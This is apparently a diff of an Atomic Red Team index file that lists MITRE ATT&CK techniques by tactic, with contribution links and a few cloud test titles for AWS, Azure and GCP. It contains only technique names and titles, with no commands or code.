+- T1218.005 Signed Binary Proxy Execution: Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.001 Access Token Manipulation: Token Impersonation/Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.012 LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.002 Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.003 Impair Defenses: Impair Command History Logging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.004 Access Token Manipulation: Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.001 Signed Binary Proxy Execution: Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.005 Indicator Removal on Host: Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
   - Atomic Test #46: AWS - GuardDuty Suspension or Deletion [iaas:aws]
+- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.012 Process Injection: Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027 Obfuscated Files or Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1578.005 Modify Cloud Compute Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1562.008 Impair Defenses: Disable Cloud Logs](../../T1562.008/T1562.008.md)
-  - Atomic Test #1: AWS - CloudTrail Changes [iaas:aws]
-  - Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
-  - Atomic Test #4: AWS - Disable CloudTrail Logging Through Event Selectors using Stratus [linux, macos, iaas:aws]
-  - Atomic Test #5: AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus [linux, macos, iaas:aws]
-  - Atomic Test #6: AWS - Remove VPC Flow Logs using Stratus [linux, macos, iaas:aws]
-  - Atomic Test #7: AWS - CloudWatch Log Group Deletes [iaas:aws]
-  - Atomic Test #8: AWS CloudWatch Log Stream Deletes [iaas:aws]
-  - Atomic Test #10: GCP - Delete Activity Event Log [iaas:gcp]
-- T1556.009 Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
-  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
-  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
-  - Atomic Test #3: GCP - Create Custom IAM Role [iaas:gcp]
+- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.014 Polymorphic Code [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.005 Access Token Manipulation: SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.010 Signed Binary Proxy Execution: Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.003 Masquerading: Rename System Utilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.004 Subvert Trust Controls: Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.004 Obfuscated Files or Information: Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1656 Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127.002 ClickOnce [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.004 Indicator Removal on Host: File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1221 Template Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.002 Obfuscated Files or Information: Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.002 Use Alternate Authentication Material: Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1216.002 SyncAppvPublishingServer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.007 Obfuscated Files or Information: Dynamic API Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.015 Process Injection: ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1220 XSL Script Processing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.001 Hide Artifacts: Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.004 Hide Artifacts: NTFS File Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.001 Process Injection: Dynamic-link Library Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1216 Signed Script Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.014 MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.010 Process Argument Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# privilege-escalation
+- T1055.011 Process Injection: Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.013 Event Triggered Execution: PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543.003 Create or Modify System Process: Windows Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.012 Boot or Logon Autostart Execution: Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1611 Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.009 Boot or Logon Autostart Execution: Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.005 Boot or Logon Autostart Execution: Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.001 Domain Policy Modification: Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.012 Event Triggered Execution: Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.008 Event Triggered Execution: Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.004 Process Injection: Asynchronous Procedure Call [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.009 Event Triggered Execution: AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.002 Process Injection: Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.001 Access Token Manipulation: Token Impersonation/Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.004 Access Token Manipulation: Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.001 Event Triggered Execution: Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1098 Account Manipulation](../../T1098/T1098.md)
+  - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
+  - Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
+  - Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
+  - Atomic Test #17: GCP - Delete Service Account Key [iaas:gcp]
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.012 Process Injection: Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.005 Access Token Manipulation: SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.015 Process Injection: ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.001 Process Injection: Dynamic-link Library Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# execution
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1047 Windows Management Instrumentation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1129 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559.002 Inter-Process Communication: Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.010 AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.001 Command and Scripting Interpreter: PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.011 Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.006 Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.003 Command and Scripting Interpreter: Windows Command Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1569.002 System Services: Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# persistence
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.013 Event Triggered Execution: PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.001 Pre-OS Boot: System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543.003 Create or Modify System Process: Windows Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.012 Boot or Logon Autostart Execution: Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.002 Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1176 Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.009 Boot or Logon Autostart Execution: Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.005 Boot or Logon Autostart Execution: Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
